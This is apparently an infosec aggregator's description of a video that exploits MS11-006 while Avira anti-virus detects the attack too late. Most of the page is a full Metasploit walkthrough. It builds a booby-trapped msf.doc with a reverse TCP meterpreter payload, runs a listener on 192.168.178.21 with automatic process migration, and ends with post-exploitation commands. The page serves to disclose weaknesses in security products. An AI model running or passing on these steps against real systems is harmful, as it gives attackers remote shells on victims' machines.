Description: This video will demonstrate you a race condition against Avira anti-virus products. This race condition is due to design errors in the Avira anti-virus themselves.
We will exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) and use a reverse TCP meterpreter payload.
As you will see, the installed "Avira AntiVir Personal" anti-virus will detect the attack, but to late. The meterpreter sessions is created and you have access to the system.
The demonstrated product is an update-to-date Avira AntiVir Personal. But this race condition appear for others Avira products, such as Avira AntiVir Premium and Avira Premium Security Suite.
Metasploit commands :
To create the msf.doc file to exploit MS11-06 vulnerability
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
To listen for incoming meterpreter sessions
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j
sysinfo
ipconfig
getpid
ps
Tags: metastploit , avira , anti-virus , antivirus , hack , windows , microsoft ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Very nice! Goes on to show that security products themselves are not fool proof.